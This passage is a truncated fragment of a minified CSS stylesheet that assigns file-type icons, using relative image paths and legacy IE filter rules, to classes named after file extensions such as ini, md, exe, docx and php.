\9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cmd.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cmd.png?ver=3.30',sizingMethod='scale');}.x-ini,.x-inf,.x-conf,.x-meta,.x-gitignore,.x-plist,.x-htaccess,.x-localized,.x-xcscheme,.x-storyboard,.x-xib,.x-strings,.x-pbxproj{background-image:url("../../../images/file_icon/icon_file/ini.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ini.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ini.png?ver=3.30',sizingMethod='scale');}.x-md,.x-markdown{background-image:url("../../../images/file_icon/icon_file/md.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/md.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/md.png?ver=3.30',sizingMethod='scale');}.x-file{background-image:url("../../../images/file_icon/icon_file/file.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/file.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/file.png?ver=3.30',sizingMethod='scale');}.x-accdb{background-image:url("../../../images/file_icon/icon_file/accdb.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/accdb.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/accdb.png?ver=3.30',sizingMethod='scale');}.x-7z{background-image:url("../../../images/file_icon/icon_file/7z.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/7z.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/7z.png?ver=3.30',sizingMethod='scale');}.x-ai{background-image:url("../../../images/file_icon/icon_file/ai.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ai.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ai.png?ver=3.30',sizingMethod='scale');}.x-air{background-image:url("../../../images/file_icon/icon_file/air.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/air.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/air.png?ver=3.30',sizingMethod='scale');}.x-arj{background-image:url("../../../images/file_icon/icon_file/arj.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/arj.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/arj.png?ver=3.30',sizingMethod='scale');}.x-apk{background-image:url("../../../images/file_icon/icon_file/apk.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/apk.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/apk.png?ver=3.30',sizingMethod='scale');}.x-as{background-image:url("../../../images/file_icon/icon_file/as.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/as.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/as.png?ver=3.30',sizingMethod='scale');}.x-ascx{background-image:url("../../../images/file_icon/icon_file/ascx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ascx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ascx.png?ver=3.30',sizingMethod='scale');}.x-ashx{background-image:url("../../../images/file_icon/icon_file/ashx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ashx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ashx.png?ver=3.30',sizingMethod='scale');}.x-asmx{background-image:url("../../../images/file_icon/icon_file/asmx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/asmx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/asmx.png?ver=3.30',sizingMethod='scale');}.x-aspx{background-image:url("../../../images/file_icon/icon_file/aspx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/aspx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/aspx.png?ver=3.30',sizingMethod='scale');}.x-bz2{background-image:url("../../../images/file_icon/icon_file/bz2.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/bz2.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/bz2.png?ver=3.30',sizingMethod='scale');}.x-cdr{background-image:url("../../../images/file_icon/icon_file/cdr.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cdr.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cdr.png?ver=3.30',sizingMethod='scale');}.x-cer{background-image:url("../../../images/file_icon/icon_file/cer.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cer.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cer.png?ver=3.30',sizingMethod='scale');}.x-chm{background-image:url("../../../images/file_icon/icon_file/chm.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/chm.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/chm.png?ver=3.30',sizingMethod='scale');}.x-cmd{background-image:url("../../../images/file_icon/icon_file/cmd.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cmd.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cmd.png?ver=3.30',sizingMethod='scale');}.x-c{background-image:url("../../../images/file_icon/icon_file/c.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/c.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/c.png?ver=3.30',sizingMethod='scale');}.x-cpp{background-image:url("../../../images/file_icon/icon_file/cpp.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cpp.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cpp.png?ver=3.30',sizingMethod='scale');}.x-cs{background-image:url("../../../images/file_icon/icon_file/cs.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cs.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cs.png?ver=3.30',sizingMethod='scale');}.x-cshtml{background-image:url("../../../images/file_icon/icon_file/cshtml.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cshtml.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cshtml.png?ver=3.30',sizingMethod='scale');}.x-csproj{background-image:url("../../../images/file_icon/icon_file/csproj.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/csproj.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/csproj.png?ver=3.30',sizingMethod='scale');}.x-css{background-image:url("../../../images/file_icon/icon_file/css.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/css.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/css.png?ver=3.30',sizingMethod='scale');}.x-csv{background-image:url("../../../images/file_icon/icon_file/csv.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/csv.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/csv.png?ver=3.30',sizingMethod='scale');}.x-djvu{background-image:url("../../../images/file_icon/icon_file/djvu.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/djvu.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/djvu.png?ver=3.30',sizingMethod='scale');}.x-dll{background-image:url("../../../images/file_icon/icon_file/dll.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dll.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dll.png?ver=3.30',sizingMethod='scale');}.x-dng{background-image:url("../../../images/file_icon/icon_file/dng.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dng.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dng.png?ver=3.30',sizingMethod='scale');}.x-dmg,.x-img{background-image:url("../../../images/file_icon/icon_file/dmg.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dmg.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dmg.png?ver=3.30',sizingMethod='scale');}.x-doc,.x-wps{background-image:url("../../../images/file_icon/icon_file/doc.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/doc.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/doc.png?ver=3.30',sizingMethod='scale');}.x-docm{background-image:url("../../../images/file_icon/icon_file/docm.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/docm.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/docm.png?ver=3.30',sizingMethod='scale');}.x-docx{background-image:url("../../../images/file_icon/icon_file/docx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/docx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/docx.png?ver=3.30',sizingMethod='scale');}.x-dot{background-image:url("../../../images/file_icon/icon_file/dot.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dot.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dot.png?ver=3.30',sizingMethod='scale');}.x-dotm{background-image:url("../../../images/file_icon/icon_file/dotm.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dotm.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dotm.png?ver=3.30',sizingMethod='scale');}.x-dotx{background-image:url("../../../images/file_icon/icon_file/dotx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dotx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dotx.png?ver=3.30',sizingMethod='scale');}.x-dtd{background-image:url("../../../images/file_icon/icon_file/dtd.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dtd.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dtd.png?ver=3.30',sizingMethod='scale');}.x-eps{background-image:url("../../../images/file_icon/icon_file/eps.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/eps.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/eps.png?ver=3.30',sizingMethod='scale');}.x-epub{background-image:url("../../../images/file_icon/icon_file/epub.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/epub.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/epub.png?ver=3.30',sizingMethod='scale');}.x-exe{background-image:url("../../../images/file_icon/icon_file/exe.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/exe.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/exe.png?ver=3.30',sizingMethod='scale');}.x-f{background-image:url("../../../images/file_icon/icon_file/f.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/f.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/f.png?ver=3.30',sizingMethod='scale');}.x-file{background-image:url("../../../images/file_icon/icon_file/file.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/file.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/file.png?ver=3.30',sizingMethod='scale');}.x-fla{background-image:url("../../../images/file_icon/icon_file/fla.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/fla.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/fla.png?ver=3.30',sizingMethod='scale');}.x-font{background-image:url("../../../images/file_icon/icon_file/font.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/font.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/font.png?ver=3.30',sizingMethod='scale');}.x-gif{background-image:url("../../../images/file_icon/icon_file/gif.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/gif.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/gif.png?ver=3.30',sizingMethod='scale');}.x-gz{background-image:url("../../../images/file_icon/icon_file/gz.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/gz.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/gz.png?ver=3.30',sizingMethod='scale');}.x-h{background-image:url("../../../images/file_icon/icon_file/h.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/h.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/h.png?ver=3.30',sizingMethod='scale');}.x-hdr{background-image:url("../../../images/file_icon/icon_file/hdr.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/hdr.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/hdr.png?ver=3.30',sizingMethod='scale');}.x-hlp{background-image:url("../../../images/file_icon/icon_file/hlp.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/hlp.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/hlp.png?ver=3.30',sizingMethod='scale');}.x-html{background-image:url("../../../images/file_icon/icon_file/html.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/html.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/html.png?ver=3.30',sizingMethod='scale');}.x-indd{background-image:url("../../../images/file_icon/icon_file/indd.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/indd.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/indd.png?ver=3.30',sizingMethod='scale');}.x-ini{background-image:url("../../../images/file_icon/icon_file/ini.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ini.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ini.png?ver=3.30',sizingMethod='scale');}.x-ipa{background-image:url("../../../images/file_icon/icon_file/ipa.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ipa.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ipa.png?ver=3.30',sizingMethod='scale');}.x-jar{background-image:url("../../../images/file_icon/icon_file/jar.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/jar.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/jar.png?ver=3.30',sizingMethod='scale');}.x-java{background-image:url("../../../images/file_icon/icon_file/java.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/java.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/java.png?ver=3.30',sizingMethod='scale');}.x-jpg{background-image:url("../../../images/file_icon/icon_file/jpg.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/jpg.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/jpg.png?ver=3.30',sizingMethod='scale');}.x-js{background-image:url("../../../images/file_icon/icon_file/js.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/js.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/js.png?ver=3.30',sizingMethod='scale');}.x-json{background-image:url("../../../images/file_icon/icon_file/json.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/json.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/json.png?ver=3.30',sizingMethod='scale');}.x-key{background-image:url("../../../images/file_icon/icon_file/key.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/key.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/key.png?ver=3.30',sizingMethod='scale');}.x-ldf{background-image:url("../../../images/file_icon/icon_file/ldf.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ldf.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ldf.png?ver=3.30',sizingMethod='scale');}.x-lnk{background-image:url("../../../images/file_icon/icon_file/lnk.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/lnk.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/lnk.png?ver=3.30',sizingMethod='scale');}.x-makefile{background-image:url("../../../images/file_icon/icon_file/makefile.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/makefile.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/makefile.png?ver=3.30',sizingMethod='scale');}.x-mdb{background-image:url("../../../images/file_icon/icon_file/mdb.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/mdb.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/mdb.png?ver=3.30',sizingMethod='scale');}.x-mdf{background-image:url("../../../images/file_icon/icon_file/mdf.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/mdf.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/mdf.png?ver=3.30',sizingMethod='scale');}.x-mht{background-image:url("../../../images/file_icon/icon_file/mht.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/mht.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/mht.png?ver=3.30',sizingMethod='scale');}.x-midi{background-image:url("../../../images/file_icon/icon_file/midi.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/midi.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/midi.png?ver=3.30',sizingMethod='scale');}.x-mpp{background-image:url("../../../images/file_icon/icon_file/mpp.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/mpp.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/mpp.png?ver=3.30',sizingMethod='scale');}.x-mpt{background-image:url("../../../images/file_icon/icon_file/mpt.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/mpt.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/mpt.png?ver=3.30',sizingMethod='scale');}.x-msg{background-image:url("../../../images/file_icon/icon_file/msg.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/msg.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/msg.png?ver=3.30',sizingMethod='scale');}.x-msi{background-image:url("../../../images/file_icon/icon_file/msi.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/msi.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/msi.png?ver=3.30',sizingMethod='scale');}.x-numbers{background-image:url("../../../images/file_icon/icon_file/numbers.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/numbers.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/numbers.png?ver=3.30',sizingMethod='scale');}.x-odp{background-image:url("../../../images/file_icon/icon_file/odp.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/odp.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/odp.png?ver=3.30',sizingMethod='scale');}.x-ods{background-image:url("../../../images/file_icon/icon_file/ods.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ods.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ods.png?ver=3.30',sizingMethod='scale');}.x-odt{background-image:url("../../../images/file_icon/icon_file/odt.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/odt.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/odt.png?ver=3.30',sizingMethod='scale');}.x-oexe{background-image:url("../../../images/file_icon/icon_file/oexe.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/oexe.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/oexe.png?ver=3.30',sizingMethod='scale');}.x-oexe2{background-image:url("../../../images/file_icon/icon_file/oexe2.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/oexe2.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/oexe2.png?ver=3.30',sizingMethod='scale');}.x-ogg{background-image:url("../../../images/file_icon/icon_file/ogg.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ogg.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ogg.png?ver=3.30',sizingMethod='scale');}.x-pages{background-image:url("../../../images/file_icon/icon_file/pages.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pages.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pages.png?ver=3.30',sizingMethod='scale');}.x-pdb{background-image:url("../../../images/file_icon/icon_file/pdb.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pdb.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pdb.png?ver=3.30',sizingMethod='scale');}.x-pdf{background-image:url("../../../images/file_icon/icon_file/pdf.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pdf.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pdf.png?ver=3.30',sizingMethod='scale');}.x-php{background-image:url("../../../images/file_icon/icon_file/php.png");background-image:none 